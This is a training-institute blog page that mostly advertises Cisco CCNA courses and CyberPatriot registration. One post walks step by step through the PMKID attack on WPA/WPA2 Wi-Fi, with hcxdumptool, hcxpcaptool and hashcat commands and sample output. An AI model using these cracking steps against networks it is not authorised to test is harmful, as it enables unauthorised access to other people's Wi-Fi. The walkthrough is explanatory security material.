Friday 14 December 2018

CCNA Cyber Ops in Sahiwal by Cisco Networking Academy Pakistan


CCNA Cybersecurity Operations

Today, emboldened cybercriminals are tapping into legitimate online resources. They leach server capacity, steal data, and demand ransoms from online victims whose information they hold hostage. The explosive growth in Internet traffic-driven largely by faster mobile speeds and the proliferation of online devices- works in their favor by helping to expand the attack surface. Facing mounting challenges from cybercrime, cyberespionage, insider threats, and advanced persistent threats, organizations are establishing SOC teams of security professionals who can monitor, detect, and respond rapidly to security incidents before they cause damage.
Gain Career Ready Cyber Security Skills
“Demand for cybersecurity professionals is expected to rise to 6 million globally by 2019.” (One Million Cybersecurity Job Openings in 2016, Forbes). Students can get ready for this in-demand job market by gaining career ready cyber security knowledge and skills from the CCNA Cybersecurity Operations curriculum. The CCNA Cybersecurity Operations curriculum provides a first step in acquiring the knowledge and skills needed to work with a SOC team, and can be a valuable part of beginning a career in the exciting and growing field of cybersecurity operations. The curriculum helps prepare students for entry-level cybersecurity career opportunities and is aligned to the Understanding Cisco Cybersecurity Fundamentals exam (210-250 SECFND) and Implementing Cisco Cybersecurity Operations exam (210-255 SECOPS) leading to the Cisco CCNA Cybersecurity Operations certification.
The course provides practical, relevant and job-ready skills aligned closely with the specific tasks expected of SOC professionals through the following components:
• Interactive, multimedia content
• Activities, virtual hands-on lab, Packet Tracer activities that reinforce learning
• Links to articles and websites for enhanced learning on specific topics
• Quizzes and exams to check students understanding of the information covered

Cyber Security Careers Cybersecurity operations jobs play a key part of securing information systems through the monitoring, detecting, investigating, analyzing, and responding to security events, thus protecting systems from cybersecurity risks, threats, and vulnerabilities. Such jobs are among the fastest-growing roles in IT, as organizations set up security operations centers (SOCs), and establish teams to monitor and respond to security incidents. CCNA Cybersecurity Operations is delivered through the Cisco NetAcad.com learning environment. Instructors can enroll students and teach the course through the same process used for other NetAcad™ courses.
Learning Objectives
Module                                                Learning Objectives
Chapter 1. Cybersecurity and the Security Operations Center
● Explain the role of the Cybersecurity Operations Analyst in the enterprise.
● Explain why networks and data are attacked.
● Explain how to prepare for a career in Cybersecurity operations.
Chapter 2. Windows Operating System
● Explain the Windows Operating System features and characteristics needed to support cybersecurity analyses.
● Explain the operation of the Windows Operating System.
● Explain how to secure Windows endpoints
Chapter 3. Linux Operating System
● Explain the features and characteristics of the Linux Operating System.
● Perform basic operations in the Linux shell.
● Perform basic Linux administration tasks.
Chapter 4. Network Protocols and Services
● Analyze the operation of network protocols and services.
● Explain how the Ethernet and IP protocols support network communications and operations
● Explain how network services enable network functionality
Chapter 5. Network Infrastructure
● Explain network topologies and the operation of the network infrastructure.
● Explain how network devices enable wired and wireless network communication.
● Explain how devices and services are used to enhance network security.
Chapter 6. Principles of Network Security
● Classify the various types of network attacks.
● Explain how networks are attacked.
● Explain the various types of threats and attacks.
Chapter 7. Network Attacks: A Deeper Look
● Use network monitoring tools to identify attacks against network protocols and services.
● Explain network traffic monitoring.
● Explain how TCP/IP vulnerabilities enable network attacks.
● Explain how common network applications and services are vulnerable to attack.
Chapter 8. Protecting the Network
● Use various methods to prevent malicious access to computer networks, hosts, and data.
● Explain approaches to network security defense.
● Use various intelligence sources to locate current security threats.
Chapter 9. Cryptography and the Public Key Infrastructure
● Explain the impacts of cryptography on network security monitoring.
● Use tools to encrypt and decrypt data.
● Explain how the public key infrastructure (PKI) supports network security.
Chapter 10. Endpoint Security and Analysis
● Explain endpoint vulnerabilities and attacks investigation process.
● Use tools to generate a malware analysis report.
● Classify endpoint vulnerability assessment information
Chapter 11. Security Monitoring
● Evaluate network security alerts.
● Explain how security technologies affect security monitoring.
● Explain the types of log files used in security monitoring.
Chapter 12. Intrusion Data Analysis
● Analyze network intrusion data to identify compromised hosts and vulnerabilities
● Explain how security-related data is collected.
● Analyze intrusion data to determine the source of an attack.
Chapter 13. Incident Response and Handling
● Explain how network security incidents are handled by CSIRTs.
● Apply incident response models, such as NIST 800-61r2 to a security incident.
● Use a set of logs to isolate threat actors and recommend an incident response plan.

Certification and Careers

The CCNA Cybersecuirty Operations curriculum prepares students for entry-level security career opportunities in a Security Operations Center, and the Understanding Cisco Cybersecurity Fundamentals (SECFND) certification exam (210-250) and Implementing Cisco Cybersecurity Operations (SECOPS) certification exam (210-255) leading to the Cisco CCNA Cybersecurity Operations certification. 

Career Institute Sahiwal Campus
Cisco Networking Academy
Address
:
Career Institute, P-4, 1st Floor, College Square, Farid Town, Sahiwal, Pakistan
Mobile
:
0314-5000083
Phone
:
041-2640083
Email
:

CCNA in Sahiwal by Cisco Networking Academy Pakistan


CCNA R&S: Introduction to Networks

CCNA Routing & Switching Curriculum

Course Overview

CCNA R&S: Introduction to Networks (ITN) covers networking architecture, structure, and functions. The course introduces the principles and structure of IP addressing and the fundamentals of Ethernet concepts, media, and operations to provide a foundation for the curriculum. 
By the end of the course, students will be able to:
  • Explain network technologies.
  • Explain how devices access local and remote network resources.
  • Describe router hardware.
  • Explain how switching operates in a small to medium-sized business network.
  • Design an IP addressing scheme to provide network connectivity for a small to medium-sized business network.
  • Configure initial settings on a network device.
  • Implement basic network connectivity between devices.
  • Configure monitoring tools available for small to medium-sized business networks.
The 70-hour, instructor-led course is the 1st of 4 courses in the Cisco CCNA Routing and Switching curriculum. The course includes activities using Packet Tracer, hands-on lab work, and a wide array of assessment types and tools.

CCNA R&S: Routing and Switching Essentials 

CCNA Routing & Switching Curriculum

Course Overview

CCNA R&S: Routing and Switching Essentials (RSE) covers the architecture, components, and operations of routers and switches in a small network. Students learn how to configure a router and a switch for basic functionality. 
By the end of the course, students will be able to:
  • Determine how a router will forward traffic based on the contents of a routing table.
  • Explain how switching operates in a small to medium-sized business network.
  • Use monitoring tools and network management protocols to troubleshoot data networks.
  • Configure monitoring tools available for small to medium-sized business networks.
  • Configure initial settings on a network device.
  • Configure Ethernet switch ports.
  • Implement VLANs.
  • Implement static routing.
  • Implement DHCP on a router.
  • Implement network address translation (NAT).
  • Implement access control lists (ACLs) to filter traffic.
The 70-hour, instructor-led course is the second of 4 courses in the Cisco CCNA Routing & Switching curriculum. The course includes activities using Packet Tracer, hands-on lab work, and a wide array of assessment types and tools.

CCNA R&S: Scaling Networks

CCNA Routing & Switching Curriculum

Course Overview

CCNA R&S: Scaling Networks (ScaN) covers the architecture, components, and operations of routers and switches in larger and more complex networks. Students learn how to configure routers and switches for advanced functionality.
By the end of this course, students will be able:
  • Configure and troubleshoot routers and switches
  • Resolve common issues with OSPF, EIGRP, and STP in both IPv4 and IPv6 networks
  • Implement a WLAN in a small-to-medium network
The 70-hour, instructor-led course is the 3rd of 4 courses in the Cisco CCNA Routing & Switching curriculum. The course includes activities using Packet Tracer, hands-on lab work, and a wide array of assessment types and tools.

CCNA R&S: Connecting Networks

CCNA Routing & Switching Curriculum

Course Overview

CCNA R&S: Connecting Networks (CN) discusses the WAN technologies and network services required by converged applications in a complex network. The course enables students to understand the selection criteria of network devices and WAN technologies to meet network requirements.
By the end of this course, students will be able:
  • Configure and troubleshoot network devices
  • Resolve common issues with data link protocols
  • Resolve common issues with OSPF, EIGRP, and STP in both IPv4 and IPv6 networks
  • Implement virtual private network (VPN) operations in a complex network
The 70-hour, instructor-led course is the 4th of 4 courses in the Cisco CCNA Routing & Switching curriculum. The course includes activities using Packet Tracer, hands-on lab work, and a wide array of assessment types and tools.

CCNA R&S 6.0: Bridging

CCNA Routing & Switching Curriculum

Course Overview

CCNA R&S 6.0: Bridging is an interim solution to address the certification gap for the newly released Cisco CCENT and CCNA Routing and Switching Certifications until the new CCNA R&S 6.0 courses are available.

Summary of Additions

  • CCNA R&S: Introduction to Networks now includes extended traceroute activities and more practice in debugging and network troubleshooting.
  • CCNA R&S: Routing and Switching Essentials has added material related to host routes, device discovery, NTP, and password recovery.
  • CCNA R&S: Scaling Networks has added VTP, extended VLANS, and DTP. You will also learn more about troubleshooting multi-VLAN and multi-area OSPF, switch stacking, and how to implement HSRP.
  • CCNA R&S: Connecting Networks has the most updates with new content in the areas of: WAN topologies, IP errors, security best practices, quality of service, cloud and virtualization, and network programming. 

Requirements

The curriculum is appropriate for students at many education levels and types of institutions, including high schools, secondary schools, universities, colleges, career and technical schools, and community centers.
For Students
  • No prerequisites

Certification and Careers

The CCNA Routing & Switching curriculum helps students develop workforce readiness skills and builds a foundation for success in networking-related careers and degree programs. 


Cisco Expert Level Instructor Award Saeed Ahmad CNAGuru

Sunday 9 December 2018

CCNA Cyber Ops in Pakistan Training & Certifications


CCNA Cybersecurity Operations

Today, emboldened cybercriminals are tapping into legitimate online resources. They leach server capacity, steal data, and demand ransoms from online victims whose information they hold hostage. The explosive growth in Internet traffic-driven largely by faster mobile speeds and the proliferation of online devices- works in their favor by helping to expand the attack surface. Facing mounting challenges from cybercrime, cyberespionage, insider threats, and advanced persistent threats, organizations are establishing SOC teams of security professionals who can monitor, detect, and respond rapidly to security incidents before they cause damage.
Gain Career Ready Cyber Security Skills
“Demand for cybersecurity professionals is expected to rise to 6 million globally by 2019.” (One Million Cybersecurity Job Openings in 2016, Forbes). Students can get ready for this in-demand job market by gaining career ready cyber security knowledge and skills from the CCNA Cybersecurity Operations curriculum. The CCNA Cybersecurity Operations curriculum provides a first step in acquiring the knowledge and skills needed to work with a SOC team, and can be a valuable part of beginning a career in the exciting and growing field of cybersecurity operations. The curriculum helps prepare students for entry-level cybersecurity career opportunities and is aligned to the Understanding Cisco Cybersecurity Fundamentals exam (210-250 SECFND) and Implementing Cisco Cybersecurity Operations exam (210-255 SECOPS) leading to the Cisco CCNA Cybersecurity Operations certification.
The course provides practical, relevant and job-ready skills aligned closely with the specific tasks expected of SOC professionals through the following components:
• Interactive, multimedia content
• Activities, virtual hands-on lab, Packet Tracer activities that reinforce learning
• Links to articles and websites for enhanced learning on specific topics
• Quizzes and exams to check students understanding of the information covered

Cyber Security Careers Cybersecurity operations jobs play a key part of securing information systems through the monitoring, detecting, investigating, analyzing, and responding to security events, thus protecting systems from cybersecurity risks, threats, and vulnerabilities. Such jobs are among the fastest-growing roles in IT, as organizations set up security operations centers (SOCs), and establish teams to monitor and respond to security incidents. CCNA Cybersecurity Operations is delivered through the Cisco NetAcad.com learning environment. Instructors can enroll students and teach the course through the same process used for other NetAcad™ courses.
Learning Objectives
Module                                                Learning Objectives
Chapter 1. Cybersecurity and the Security Operations Center
● Explain the role of the Cybersecurity Operations Analyst in the enterprise.
● Explain why networks and data are attacked.
● Explain how to prepare for a career in Cybersecurity operations.
Chapter 2. Windows Operating System
● Explain the Windows Operating System features and characteristics needed to support cybersecurity analyses.
● Explain the operation of the Windows Operating System.
● Explain how to secure Windows endpoints
Chapter 3. Linux Operating System
● Explain the features and characteristics of the Linux Operating System.
● Perform basic operations in the Linux shell.
● Perform basic Linux administration tasks.
Chapter 4. Network Protocols and Services
● Analyze the operation of network protocols and services.
● Explain how the Ethernet and IP protocols support network communications and operations
● Explain how network services enable network functionality
Chapter 5. Network Infrastructure
● Explain network topologies and the operation of the network infrastructure.
● Explain how network devices enable wired and wireless network communication.
● Explain how devices and services are used to enhance network security.
Chapter 6. Principles of Network Security
● Classify the various types of network attacks.
● Explain how networks are attacked.
● Explain the various types of threats and attacks.
Chapter 7. Network Attacks: A Deeper Look
● Use network monitoring tools to identify attacks against network protocols and services.
● Explain network traffic monitoring.
● Explain how TCP/IP vulnerabilities enable network attacks.
● Explain how common network applications and services are vulnerable to attack.
Chapter 8. Protecting the Network
● Use various methods to prevent malicious access to computer networks, hosts, and data.
● Explain approaches to network security defense.
● Use various intelligence sources to locate current security threats.
Chapter 9. Cryptography and the Public Key Infrastructure
● Explain the impacts of cryptography on network security monitoring.
● Use tools to encrypt and decrypt data.
● Explain how the public key infrastructure (PKI) supports network security.
Chapter 10. Endpoint Security and Analysis
● Explain endpoint vulnerabilities and attacks investigation process.
● Use tools to generate a malware analysis report.
● Classify endpoint vulnerability assessment information
Chapter 11. Security Monitoring
● Evaluate network security alerts.
● Explain how security technologies affect security monitoring.
● Explain the types of log files used in security monitoring.
Chapter 12. Intrusion Data Analysis
● Analyze network intrusion data to identify compromised hosts and vulnerabilities
● Explain how security-related data is collected.
● Analyze intrusion data to determine the source of an attack.
Chapter 13. Incident Response and Handling
● Explain how network security incidents are handled by CSIRTs.
● Apply incident response models, such as NIST 800-61r2 to a security incident.
● Use a set of logs to isolate threat actors and recommend an incident response plan.

Certification and Careers

The CCNA Cybersecuirty Operations curriculum prepares students for entry-level security career opportunities in a Security Operations Center, and the Understanding Cisco Cybersecurity Fundamentals (SECFND) certification exam (210-250) and Implementing Cisco Cybersecurity Operations (SECOPS) certification exam (210-255) leading to the Cisco CCNA Cybersecurity Operations certification. 

Trainer: SAEED AHMAD
Institute: Cisco Networking Academy - Career Institute
Whatsapp:  +92-301-7640931




Monday 27 August 2018

CyberPatriot XI Registration is Open


CyberPatriot season XI is open and will remain open until 3 Oct 2018!  Sponsored by Northrup Gumman, ​​​​the CyberPatriot is a National Youth Cyber Education Program created by the US Air Force Association to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our future.  While it is a US program, youth from around the world are invited to participate.

To register visit CyberPatriot Registratration -- register as a coach, team, technical mentor, or team assistant. 

Program Benefits Provided by Cisco include: NetLabs (Integration into local and regional Competitions), Skills Development (for Students & Instructors), Online Competition, Cisco Engineers as Local Mentors, the Cisco Networking Challenge, Access to Packet Tracer and Instructor Professional Development.

A focal point of CyberPatriot is the National Youth Cyber Defense Competition. The competition has teams of high school and middle school students acting in the role of newly hired IT professionals tasked with managing the network of a small company.

In the rounds of competition, teams are given a set of virtual images that represent operating systems and are tasked with finding cybersecurity vulnerabilities within the images and hardening the system while maintaining critical services.  Teams compete for the top placement within their state or region, with top teams earning an all-expenses-paid trip to Baltimore, MD for the National Finals Competition where they can earn recognition and scholarship money.​

CyberPatriot is an English-speaking competition based in the US. Visit the CyberPatriot Program Website for more information.


CCNA Classes near me Faisalabad | Hack Wifi using Pairwise Master Key ID (PMKID)




A New Method Discovered to Crack WPA/WPA2 PSK Enabled WiFi Network Passwords


New Attack method discovered to compromise the WPA/WPA2 enabled WiFi networks that allow attackers to gain Pre-shared Key hash that used to crack Passwords used by targeted victims.
This Method is discovered during the attack against the recently released WPA3 security standard which is extremely harder to crack since its used Simultaneous Authentication of Equals (SAE), a modern key establishment protocol.
New WP3 Security Standard released by Wi-Fi Alliance that provides Next-generation Wi-Fi Security with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard that is a successor of WPA2.
Researcher finds this attack to compromise the WPA/WPA2 password without performing EAPOL 4-way handshake.
According to Steube who is the developer of Hashcat password cracking tool, The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.
Also, this attack work Against all type of  802.11i/p/q/r networks with roaming functions enabled and it’s unclear how many vendors and how many routers this technique will work.

How Does this WPA/WPA2 WiFi Password Attack Works

Robust Security Network Information Element (RSN IE) is an optional one in 802.11 management frames and its working in a single EAPOL frame.
Pairwise Master Key ID (PMKID) can be captured from RSN IE whenever the user tries to authenticate with the router.

“Here we can see that the PMKID has been captured is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.”
In order to make use of this new attack you need the following tools:

Step 1

First Run hcxdumptool to gain the  PMKID from the AP  and dump the file in PCAP format using following code.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
The output looks like this:
start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code.
$ ./hcxpcaptool -z test.16800 test.pcapng
The content of the written file will look like this and it split into 4 columns.
PMKID * MAC AP * MAC Station * ESSID
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
Also, Researcher recommends that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3 

Finally, Run hashcat to crack it, we need to use the hash mode PMKID -16800 and we can be used this hash as any other hash type using following code,
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash  WPA-PMKID-PBKDF2
When we look at previously available WiFi attacks, we need to sit back and wait until the target user logged in later we can crack the key by capturing the four-way handshake.
In order to get access to the PMKID, this new attack simply has to attempt to authenticate to the wireless network later we can easily crack the pre-shared key.
Also, this method is much easier to access the hash that contains the pre-shared key and later moment the hash will be cracked, also this attack is little complex based on the complexity of the password.


Saturday 25 August 2018

CCNA Classes Faisalabad | First step toward a networking career

CCNA R&S: Introduction to Networks

By Cisco Networking Academy

Begin preparing for a networking career with this introduction to how networks operate. This includes learning the architecture, structure, and functions needed to support the operations and priorities of Fortune 500 companies to small innovative retailers. You will even get the chance to configure a network yourself, such as a simple LAN (Local Area Network). After completing this course, you will have a working knowledge of routing, switching, network applications and protocols. This is the first course in a 4-course series designed to prepare you for entry-level networking jobs. No prerequisites required.

Length:  70 hours
Cost: Registration Fee Only
Level: IntermediateLearning Type: Instructor-led

CCNAGuru
+92-301-7640931
Get Online TRaining and Certifications